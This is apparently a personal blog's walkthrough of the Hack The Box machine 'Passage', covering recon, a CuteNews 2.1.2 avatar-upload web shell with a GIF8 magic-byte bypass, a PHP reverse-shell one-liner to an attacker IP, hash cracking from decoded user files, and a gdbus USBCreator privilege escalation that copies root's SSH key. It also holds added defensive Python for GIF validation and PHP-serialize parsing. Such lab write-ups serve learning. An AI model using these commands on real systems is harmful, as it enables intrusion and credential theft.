This is a write-up of Passage on Hack The Box.
As always, we start with our basic Nmap scans. The results are below:
nux@KakaLinpoop:~/Documents/htb/boxes/passage/nmap$ nmap -T4 10.10.10.206 -p 22,80 -sC -oN scriptScans
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-18 21:20 CDT
Nmap scan report for 10.10.10.206
Host is up (0.070s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey:
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  http
|_http-title: Passage News
Port 80 – HTTP
Good ol' HTTP. It's just a news feed called "Passage News." The noteworthy bit I see is "Implemented Fail2Ban." According to the post related to that, it seems we probably shouldn't attempt to brute-force the site. Guess GoBuster is out of the question for now (unless we find a workaround). Attacking the server will result in a two-minute ban. We also checked for robots.txt. No luck there, either.
Here's the text of the post mentioning Fail2Ban:
18 Jun 2020 By admin 0 Comments
Due to unusually large amounts of traffic, we have implemented Fail2Ban on our website. Let it be known that excessive access to our server will be met with a two minute ban on your IP Address. While we do not wish to lock out our legitimate users, this decision is necessary in order to ensure a safe viewing experience. Please proceed with caution as you browse through our extensive news selection.
We see a few emails in the source code. It may be worth pulling them for later:
curl -X GET http://10.10.10.206/ >> stuff.txt
Then we can use cut and sort to pull the names themselves:
cat stuff.txt | egrep "@" | cut -d ":" -f 2 | cut -d "@" -f 1 | sort | uniq > names
Here we are:
kim
nadav
paul
sid
Maybe these will be useful later.
If I want to go further, I can create a separate list for emails:
cat stuff.txt | egrep "@" | cut -d ":" -f 2 | cut -d '"' -f 1 | sort | uniq > emails
That creates the following list:
firstname.lastname@example.org email@example.com firstname.lastname@example.org email@example.com
I'd wager that the ones that matter are the ones that say "@passage", so we can grep that out and we will have:
At http://10.10.10.206/index.php?id=2, I also find some other names. All of them except for James (with no last name) appear to be game designers (probably not relevant, but an interesting tidbit of info):
- Sid Meier
- Kim Swift
I will add James to the list of names.
We can also see that the site is powered by something called "Cute News." Searching for that takes me here. We might have to research that a bit.
Looking up some vulnerabilities
We can search around for CuteNews vulnerabilities. Here's an interesting one for CuteNews 2.1.2, and it's RCE. Medium has a post about it here.
That's cool, but we don't know yet if this is the vulnerable version, and we need a valid login to access it. Let's see what we can find.
Seems the default login page is /CuteNews. We can also check it out on GitHub if you're curious.
Finding CuteNews was a bit lucky, because I found it on the Medium blog post linked above. Luckily, it also lists the version, which in this case is in fact 2.1.2.
The version number is near the bottom of the screenshot "Powered by CuteNews 2.1.2."
What we have so far
Some possible usernames:
kim nadav paul sid james admin
A login page. We also have to be careful not to lock ourselves out.
I tested those names with a few default-type passwords (password, password123, admin, etc.).
Eventually I tried with Burp Intruder, and got nothing. Then, I realized I was over complicating it. There's an option to create a user. On a whim, I tried it.
Amazingly, this worked, and gave me the file upload option I needed. Initially, I used the name Kim, thinking that it would tell me the user already existed. It didn't. It just created the user and gave me access.
Now, I log in with my newly-created user and I see my initial login page:
Now, click on "Personal Options."
We look back at the entry on ExploitDB: https://www.exploit-db.com/exploits/48458
We can upload a PHP shell as our "Avatar." I tend to use my favorite, phpbash. If you drop it on the box as-is, it actually won't work. There's a file check. We can usually bypass these sorts of checks with the magic bytes, so we simply add GIF8; as the first line of the file. Now we upload it and click "view image".
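Why that trick works is worth seeing from the defender's side. This is an added example (mine, not code from the post or from CuteNews) contrasting a prefix-only check, which is all the "GIF8;" line needs to satisfy, with a validator that walks the whole GIF block structure and rejects anything after the trailer. Function names and the two sample files are constructed for the example.

```python
import struct

def naive_is_gif(data: bytes) -> bool:
    """The kind of check the post bypasses: only the leading bytes are inspected."""
    return data[:4] == b"GIF8"

def _skip_sub_blocks(data: bytes, pos: int) -> int:
    # GIF data sub-blocks: <len><bytes>... ended by a zero-length block
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[pos]
        pos += 1 + n
        if n == 0:
            return pos

def strict_is_gif(data: bytes) -> bool:
    """Parse header, screen descriptor, colour tables, images and extensions;
    accept only if the trailer (0x3B) is the very last byte of the file."""
    try:
        if data[:6] not in (b"GIF87a", b"GIF89a") or len(data) < 13:
            return False
        w, h, packed = struct.unpack_from("<HHB", data, 6)
        pos = 13
        if packed & 0x80:                      # global colour table present
            pos += 3 * (2 << (packed & 0x07))  # 3 * 2^(N+1) bytes
        while True:
            block = data[pos]
            if block == 0x3B:                  # trailer must end the file
                return pos + 1 == len(data) and w > 0 and h > 0
            if block == 0x2C:                  # image descriptor (10 bytes)
                ipacked = data[pos + 9]
                pos += 10
                if ipacked & 0x80:             # local colour table
                    pos += 3 * (2 << (ipacked & 0x07))
                pos += 1                       # LZW minimum code size
                pos = _skip_sub_blocks(data, pos)
            elif block == 0x21:                # extension: label then sub-blocks
                pos = _skip_sub_blocks(data, pos + 2)
            else:
                return False
    except (IndexError, struct.error, ValueError):
        return False

# Constructed samples: a minimal 1x1 GIF, and a text file wearing a GIF8 prefix.
TINY_GIF = (b"GIF89a" + b"\x01\x00\x01\x00\x00\x00\x00"
            + b"\x2c" + b"\x00\x00\x00\x00\x01\x00\x01\x00\x00"
            + b"\x02" + b"\x02\x44\x01" + b"\x00" + b"\x3b")
FAKE_GIF = b"GIF8;\nthis is not an image\n"
```

Structural validation narrows what gets through, but the upload directory still should not be one the web server executes scripts from.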
We are redirected to:
Now we have a basic shell. From there, I set up a reverse shell so I can begin the process of upgrading it. I use my super-derpy EZShellz tool to make this easier:
python3 ezshell.py -i 10.10.14.46 -p 4444 -l php
[+] PHP Reverse shell: php -r '$sock=fsockopen("10.10.14.46",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
It's automatically added to my clipboard, so I start my listener and paste the output to the terminal of the victim machine. Easy work.
Eventually, through extensive enumeration, we find a directory called users:
There are a bunch of PHP files in there. We can cat them out and they look something like this:
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=
<?php die('Direct call - access denied'); ?>
== Cut down for space ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=
I removed all the instances of that php error message "access denied" to give me only the base64-encoded strings.
Now I decode the strings:
cat b64Text | base64 -d > decoded
We can also use the following one-liner:
cat * | grep -v "denied" | base64 -d > output.txt
This gives us some users and hashes we can try to crack.
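Base64-decoding only gets you to PHP serialize() output, so here is an added example (mine, not from the post or from CuteNews) that strips the PHP stub and actually parses the three records quoted above (strings, ints, nested arrays) with the standard library. The record strings are the ones on the page; the sample file text and the function names are constructed.

```python
import base64
import re

# The three base64 records quoted above, with the PHP stub already removed.
RECORDS = [
    "YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319",
    "YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=",
    "YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=",
]
STUB = "<?php die('Direct call - access denied'); ?>"
# Constructed stand-in for `cat *` over a cdata/users directory.
SAMPLE_FILE = STUB + RECORDS[0] + STUB + RECORDS[1]

def _parse(data: bytes, pos: int):
    """Parse one PHP-serialized value at pos; return (value, next_pos).
    Handles the types these records use: s (string), i (int), a (array)."""
    tag = chr(data[pos])
    if tag == "s":                                   # s:<len>:"<bytes>";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                            # skip ':"'
        value = data[start:start + length].decode("utf-8")
        return value, start + length + 2             # skip '";'
    if tag == "i":                                   # i:<digits>;
        end = data.index(b";", pos)
        return int(data[pos + 2:end]), end + 1
    if tag == "a":                                   # a:<count>:{key;value...}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                              # skip ':{'
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            val, pos = _parse(data, pos)
            result[key] = val
        return result, pos + 1                       # skip '}'
    raise ValueError(f"unsupported PHP type {tag!r} at offset {pos}")

def decode_record(b64: str) -> dict:
    """base64 -> PHP serialized bytes -> Python dict."""
    value, _ = _parse(base64.b64decode(b64), 0)
    return value

def file_to_records(text: str) -> list:
    """Drop every '<?php ... ?>' stub, then decode each remaining blob."""
    body = re.sub(r"<\?php.*?\?>", "\n", text)
    return [decode_record(tok) for tok in body.split()]
```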
There's no really quick way to do this. We just have to grab the hashes and pass them to a hash cracker. I use Crackstation for CTF-type challenges (never for real engagements).
Eventually, we will find one we can use:
That gives us the following password:
So now we have:
SSH failed, because we need a key, so we will simply run the switch user command:
www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
Password:
paul@passage:/var/www/html/CuteNews/cdata/users$ id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
Awesome. We are now paul.
Paul has a private key for user nadav stored in his .ssh folder. We can copy that private key over to our box and SSH in as nadav (use -i to specify the private key). Now we SSH in as nadav.
Next, we have to figure out how to become root.
Enumerating the machine, I eventually came to gdbus. This is another tricky one where I just happened to Google the right thing after hours of searching and a bit of help from a friend who had worked on it a day or two before. I think he said "ride the bus."
There are a few writeups going over privesc with gdbus:
Figure 10 on this guide https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/ pretty much sums it up.
I hopped on over to /var/tmp and created a directory called woop just to work out of. Then I ran the following:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /var/tmp/woop/derp true
Anyway, we are granted a private key with the filename "derp." Now we use that to ssh into the server.
I was feeling lazy, so I just did this while sitting in the directory I'd copied the file from.
nadav@passage:/var/tmp/woop$ ssh firstname.lastname@example.org -i derp
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:oRyj2rNWOCrVh9SCgFGamjppmxqJUlGgvI4JSVG75xg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
root@passage:~#
You can also kinda do it as a one-liner for funsies:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /var/tmp/woop/derp true && ssh email@example.com -i derp -y
()
Last login: Tue Mar 9 19:49:08 2021 from 127.0.0.1
root@passage:~#
A note on this box
So, as always, I'm late. I am kinda lame like that, but this blog is really just a side thing I do for my own learning. That said, there's only a little bit of value in my putting together these writeups. I think I want to put together a couple more posts where I go over the initial foothold and privesc in a little more detail, so I can go over what I actually learned rather than just be like, "Yo. Here's a write up. Peace!"